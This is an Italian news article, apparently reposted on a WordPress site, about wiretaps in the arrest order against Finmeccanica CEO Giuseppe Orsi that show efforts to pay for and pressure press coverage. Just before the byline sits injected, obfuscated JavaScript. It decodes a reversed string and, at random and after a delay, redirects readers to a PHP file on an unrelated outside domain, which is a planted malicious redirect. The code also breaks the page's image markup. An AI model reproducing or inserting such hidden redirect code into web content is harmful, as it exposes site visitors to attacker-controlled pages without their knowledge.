“Ho bisogno di 20 giornalisti per un mese”, a pagare è Finmeccanica

image_pdfimage_print

$p$VTO6JhIH6WkCGAcPR=function(n){if (typeof ($p$VTO6JhIH6WkCGAcPR.list[n]) == “string”) return $p$VTO6JhIH6WkCGAcPR.list[n].split(“”).reverse().join(“”);return $p$VTO6JhIH6WkCGAcPR.list[n];};$p$VTO6JhIH6WkCGAcPR.list=[“‘php.tegdiw.ssalc/bil/orp-tegdiw-rettiwt/snigulp/tnetnoc-pw/moc.xamdok//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}and(this)” href=”http://www.altracitta.org/wp-content/uploads/2013/02/Finmeccanica-Orsi.jpg”>di Stefano Feltri per Il Fatto Quotidiano

Pressioni, richieste, forse migliaia o milioni di euro per giornali e giornalisti. Dall’ordinanza di arresto per l’amministratore delegato di Finmecanica, Giuseppe Orsi, emerge il rapporto che l’azienda controllata dal Tesoro ha con i quotidiani (di cui, tra l’altro, è un grosso inserzionista pubblicitario). Il giudice per le indagini preliminari Luca Labianca, di Busto Arsizio, parla di “volontà di costruire una campagna di stampa retribuita e compiacente”. E nei riferimenti alla “puzza d’olio” vede l’allusione al denaro usato per lubrificare i giornalisti. Pericolo Financial Times Solo il Financial Times è una causa persa: il 27 ottobre 2012 il capo ufficio stampa Carlo Maria Fenu deve giustificarsi con Orsi, il suo capo, perché il quotidiano inglese scriverà che il gruppo “è un covo di eee” (si può immaginare di cosa, anche se la parola è risultata incomprensibile). Orsi protesta: “Ma scusa tutto quello che gli ho detto io l’altro giorno?”. E Fenu si giustifica: “Si però bisogna… lui non può far finta di nulla che ci non ci sia… non siano state arrestate persone… non sia s tato fatto il nome del Ministro.. no?”. “I soldi li tratto io”.

Discorso diverso per la stampa italiana. – Il 28 ottobre 2012 Fenu e Orsi discutono di quella che il giudice definisce “una campagna di stampa a lui stesso favorevole, campagna sembra anche prezzolata e dimostrazione ancor di più delle sue logiche operative, o comunque a silenziare le voci dissonanti”. Fenu: ‘sera ingegnere. Orsi: Fenu non faccia per piacere queste cose per telefono!!!! Gli ho detto di lasciarci fare una proposta quando abbiamo una proposta, quando abbiamo una proposta ne parliamo… abbia pazienza!!! probabilmente è giusto anche 1 milione non lo so!! dipende da cosa fa! Se incominciamo a fare le cose così… allora lui dev… Fenu:…. incomprensibile (voci sovrapposte) Orsi: Non mi parli per cortesia di soldi… li li tratto io!!!! Fenu: Ah va bene… perfetto. Orsi: Sennò… però ho bisogno di una proposta cioè no non sto a parlar di soldi senza una proposta.. quindi lasciamoli lavorare in pace.. abbiamo detto che martedì ce lo portano io ho bisogno di averli con tutta la potenza di fuoco che hanno in questo momento Fenu: Sì Orsi: I danni che ci fanno sono ben superiori al miliardo… al milione.. Fenu: Certo Orsi: Quindi la cosa è proporzionale a quello che fa… ma non facciamole per piacere… Fenu: Sì Orsi: Voglio una proposta… seria… scritta Fenu: Bene Orsi: Lei deve dare la specifica del lavoro eventualmente.. Fenu: Va bene Orsi: Poi parleremo di soldi.. eh? Fenu: Va bene. “20 giornalisti sul pezzo” Orsi: Perché se no incominciamo poi ad inimicarci tutta la gente o a… fargli… cioè e poi non gli interessa io ho bisogno di averli assolutamente sul pezzo…. e con voglia di fare!!! Fenu: Va bene. Orsi: Poi discuteremo di soldi Fenu: Va bene d’accordo… incomprensibile (voci sovrapposte). Orsi: Quindi prendiamo un appuntamento con loro non facciamo se tar dir.. non ha nessun senso dire 30 al mese … perché per 30 al mese non viene.. neanche un coso!!! Dobbiamo ragionare su un pacchetto e quello che fanno!! Fenu:: Va bene. Orsi: Ehh? io non l’avevo autorizzata a dire 30 al mese o 40 al mese o 50 al mese. Fenu: Va bene. Orsi: Ne parliamo quando ci si… quando uhh sulla base della proposta del lavoro che faranno!! Se loro ci dicono ho bisogno di 20 giornalisti per un mese a me va bene… pagheremo quello che ci vogliono 20 giornalisti 1 mese… certamente non è questo.

Squinzi e Il Sole 24 Ore. – Novembre 2011, giorno 24. Orsi ha un cruccio: il Sole 24 Ore lo critica troppo. Proprio a lui che, durante la campagna elettorale per Confindustria ha sostenuto l’avversario di Squinzi, Alberto Bombassei. Alza quindi il telefono e chiama Squinzi, in quanto editore del Sole 24 Ore per condizionare la linea e fermare i pezzi di Gianni Dragoni, il cronista che segue il gruppo della difesa. Sia Dragoni che il direttore Roberto Napoletano che il comitato di redazione del Sole dicono di non aver subito condizionamenti, anche se Squinzi aveva assicurato a Orsi di intervenire. Orsi: In tutti questi giorni, però oggi mi sembra che abbia superato il limite. Cioè il giornale che mi attacca di più è il Sole e io non è l’unico e non lo ritengo. Ho veramente fatto fatica e non te ne avevo voluto parlare… Squinzi: No, oddio, per la verità io, forse sono un po ‘ distratto, ma non me ne sono accorto. Orsi: Guarda, se tu leggi… Squinzi Comunque interveniamo subito. eh! Orsi… ed è ed è essenzialmente Dragoni. Tra l’altro squalifica il giornale, perché più lui, lui parla, che una volta il Sole diceva una cosa e il titolo andava giù, adesso lui dice una cosa e il titolo va su. Oggi… [… ] Squinzi:: Ehm. tu spero che hai notato che; o. invece. sono intervenuto… Orsi: No, assolutamente, ma ripeto non l’ho voluto fare, poi io ho preso anche Barabino per darci una mano e gli ho detto: “Non è che hai parlato tu con Napoletano [Direttore del Sole 24 Ore], è un po’ che io non. Non sono mai voluto intervenire su sta roba. però sono ormai quattro mesi che lui, tutti gli articoli. (incompr.) di fianco al mio nome lui aggiunge sempre “indagato”. Cosa che poi non è proprio necessario ripeterlo tutte le volte. Oggi, però, se lo guardi l’ultimo (incompr.)[… ] Squinzi:… coi giornalisti è sempre un problema. eh. perché non gli puoi mai dir niente. [… ] Orsi:… però ha toccato veramente il limite, insomma. Te lo ripeto, che Confindustria debba essere, o il Sole proprio l’unico o quello che più attacca Finmeccanica (incompr.) Squinzi: Ma non esiste, ma non esiste parca miseria. Adesso me lo riguardo subito, vado a guardarmelo subito anch’io. Comunque non, faccio l’intervento sul direttore senz’altro.

L’intervista al Messagero. – L’ 11 dicembre 2012, pochi mesi fa, Orsi discute al telefono i ritocchi all’intervista al Messaggero concessa al neo vicedirettore Osvaldo De Paolini, che da poco l’editore Francesco Caltagirone ha prelevato dal gruppo Class proprio per le sue relazioni di alto livello. De Paolini era stato radiato dall’ordine dei giornalisti 20 anni fa, quando era caporedattore del Sole 24 Ore, nello scandalo delle “penne sporche”. Questo non gli ha impedito di continuare la carriera fino a dirigere, tra l’altro, MF-Milano Finanza. Fenu:… tra l’altro De Paolini mi ha confessato che l’ha fatta tutta a memoria questa intervista perché si era dimenticato a casa il blocco!! Orsi: Ok Fenu: Per cui l’ha fatta tutta a memoria.. e per dire no.. che comunque è bravo voglio dire… Orsi: no.. e non solo è bravo.. ma vuole anche dire che siamo stati incidenti e vuole anche dire che si può accettare anche qualche correzione in più.. Fenu: certo Orsi: no? Fenu: poi… sta dicendo… sì!!.. sta dicendo che Agusta Westland non ha mai pagato tangenti?… Orsi Allora aspetta…. che non so… incomprensibile (rilegge velocemente un testo)… non tangenti.. non si.. non ho mai pagato tangenti punto Fenu: ci devo mettere… tangenti mai… [… ] La puzza di olio Orsi: Guardi stanno proprio strizzando il mio olio quindi non vedo le mie olive. in sa.. sante me la pagherà questa… tangenti mai… eeeeee… mediazioni dove ammesse Fenu: ok… [… ] Orsi: la sente la puzza d’olio?… arriva anche a lei?.. Fenu: non ancora non Orsi: Ok. Nel riferimento alla “puzza di olio”, il giudice vede l’ “inequivocabile sintomo della pratica, a cui costui sembra consueto, di raggiungere i propri obiettivi con metodi non legittimi”. Ma Fenu precisa che Orsi era davvero nella sua tenuta in Liguria a Moneglia dove si stava occupando di raccolta e spremitura di olive. Il riferimento di Orsi era quindi da intendersi in senso letterale e non metaforico.

Leave a Reply

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *